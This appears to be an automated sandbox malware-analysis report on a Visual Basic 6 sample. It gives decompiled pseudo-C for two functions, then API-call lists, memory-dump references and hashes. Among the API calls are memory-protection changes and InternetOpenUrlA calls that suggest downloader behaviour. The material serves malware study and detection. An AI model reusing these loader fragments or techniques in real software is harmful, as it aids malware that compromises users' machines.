                    • Opcode ID: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                    • Instruction ID: 4b25c979fca95e85091d665f10c397e12c70c7e34684666f5dd652a0ccf7a8f1
                    • Opcode Fuzzy Hash: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                    • Instruction Fuzzy Hash: E4113A74900688EFCB01AFA5CC45B9DBBB5FF08745F10806AF541BA1E1C7789A45CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E0040BD46(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                    				signed int _t34;
                    				short _t36;
                    				void* _t38;
                    				void* _t45;
                    				void* _t46;
                    				void* _t47;
                    				intOrPtr _t48;
                    
                    				_t38 = __ecx;
                    				asm("in al, dx");
                    				_t48 = _t47 - 0xc;
                    				 *[fs:0x0] = _t48;
                    				L00401120();
                    				 *((intOrPtr*)(_t45 - 0xc)) = _t48;
                    				 *((intOrPtr*)(_t45 - 8)) = E004010B0;
                    				 *((intOrPtr*)(_t45 - 4)) = 0;
                    				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 4))( *((intOrPtr*)(_t45 + 8)), __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126);
                    				_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 0x58))( *((intOrPtr*)(_t45 + 8)), _t45 - 0x40);
                    				asm("fclex");
                    				 *(_t45 - 0x44) = _t34;
                    				if( *(_t45 - 0x44) >= 0) {
                    					 *(_t45 - 0x50) =  *(_t45 - 0x50) & 0x00000000;
                    				} else {
                    					_push(0x58);
                    					_push(0x4020d4);
                    					_push( *((intOrPtr*)(_t45 + 8)));
                    					_push( *(_t45 - 0x44));
                    					L004011F2();
                    					 *(_t45 - 0x50) = _t34;
                    				}
                    				HideCaret( *(_t45 - 0x40));
                    				L004011EC();
                    				_push(0);
                    				_t36 =  *0x004039FF();
                    				_t46 = _t45 + 1;
                    				asm("aam 0xa");
                    				 *_t36 =  *_t36 + _t36;
                    				 *((intOrPtr*)(_t46 - 0x17af2bbb)) =  *((intOrPtr*)(_t46 - 0x17af2bbb)) + _t38;
                    				 *((short*)(_t46 - 0x1c)) = _t36;
                    				L004011E0();
                    				_push(E0040BE01);
                    				return _t36;
                    			}

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                    • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                    • HideCaret.USER32(?), ref: 0040BDBC
                    • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                    • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                    • String ID:
                    • API String ID: 2961917346-0
                    • Opcode ID: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                    • Instruction ID: 66d8ca1993ac17da8515e34f646b0e7e8b9bd3e58b8d3ce0fd8b4448664758be
                    • Opcode Fuzzy Hash: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                    • Instruction Fuzzy Hash: 25114934900688EFCB01AFA4CC45B9DBFB5EF08744F10806AF641BA1A1C7789A46CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 60%
                    			E0040C261(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				void* _v24;
                    				signed int _v32;
                    				signed int _v40;
                    				signed int _t20;
                    				void* _t28;
                    				intOrPtr _t30;
                    
                    				 *[fs:0x0] = _t30;
                    				L00401120();
                    				_v12 = _t30;
                    				_v8 = 0x401108;
                    				L004011DA();
                    				_t20 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401126, __ecx, __ecx, _t28);
                    				asm("fclex");
                    				_v32 = _t20;
                    				if(_v32 >= 0) {
                    					_v40 = _v40 & 0x00000000;
                    				} else {
                    					_push(0x14c);
                    					_push(0x4020d4);
                    					_push(_a4);
                    					_push(_v32);
                    					L004011F2();
                    					_v40 = _t20;
                    				}
                    				_push(E0040C2E0);
                    				L004011B0();
                    				return _t20;
                    			}

                    APIs
                    • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C27C
                    • __vbaStrCopy.MSVBVM60(?,?,?,?,00401126), ref: 0040C294
                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020D4,0000014C,?,?,?,?,00401126), ref: 0040C2C4
                    • __vbaFreeStr.MSVBVM60(0040C2E0,?,?,?,?,?,?,00401126), ref: 0040C2DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302132577.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.2302129180.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000004.00000002.2302138392.000000000040D000.00000004.00020000.sdmp
                    • Associated: 00000004.00000002.2302141868.000000000040F000.00000002.00020000.sdmp
                    Similarity
                    • API ID: __vba$CheckChkstkCopyFreeHresult
                    • String ID:
                    • API String ID: 3646427762-0
                    • Opcode ID: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                    • Instruction ID: e6314aaefe9858c2768dfea9a20980395283ff53a00ce7bf66a0ac0bf510db14
                    • Opcode Fuzzy Hash: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                    • Instruction Fuzzy Hash: 6E011A70940209EFCB04DF95C946FAE7BB4EB08754F10416AF6057A5E0C3B95A01DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: LibraryLoadMemoryProtectVirtual
                    • String ID: y
                    • API String ID: 3389902171-1128323793
                    • Opcode ID: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                    • Instruction ID: b5a1c13f13509c146d0012a6ae06c69a599a2323081684cb58adc98df93dfcfc
                    • Opcode Fuzzy Hash: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                    • Instruction Fuzzy Hash: CA225A70640301EFEF219F24CDD4BEA77A3AF26360F658229ED958B2D6D37588858712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: FileInternetRead
                    • String ID:
                    • API String ID: 778332206-0
                    • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction ID: f1526dd3d22c9a5b7326bf5fd8f01987d308a936f4a6ffc2fe4fa24faa1ef35d
                    • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                    • Instruction Fuzzy Hash: 99417A35204306CEEB296D38C9A47F67793BF76320FAA5139D886875A5E37C88C5D601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,001B5609,00000040), ref: 001B5A87
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: MemoryProtectVirtual
                    • String ID:
                    • API String ID: 2706961497-0
                    • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                    • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                    • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2365264924.000000001E980000.00000040.00000001.sdmp, Offset: 1E970000, based on PE: true
                    • Associated: 00000005.00000002.2365254148.000000001E970000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365351029.000000001EA60000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365381087.000000001EA70000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365398250.000000001EA74000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365410768.000000001EA77000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365436626.000000001EA80000.00000040.00000001.sdmp
                    • Associated: 00000005.00000002.2365505490.000000001EAE0000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • InternetOpenA.WININET(001B36E3,00000000,00000000,00000000,00000000), ref: 001B3075
                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 001B3135
                    Memory Dump Source
                    • Source File: 00000005.00000002.2360446940.00000000001B1000.00000040.00000001.sdmp, Offset: 001B1000, based on PE: false
                    Similarity
                    • API ID: InternetOpen
                    • String ID:
                    • API String ID: 2038078732-0
                    • Opcode ID: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                    • Instruction ID: f0387fa4bcb7b86e55a38a109098cec53638d918e284299cfc6987acf3e3d97c
                    • Opcode Fuzzy Hash: c232d9fc68feea7f1cf8b56284282e5b699399b4ae613a7065e6cccd1fc642c9
                    • Instruction Fuzzy Hash: 5741E63024038AABEF355E54CDA5FFE3769AF00780F508129FD9AAA190EB70C654AA10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
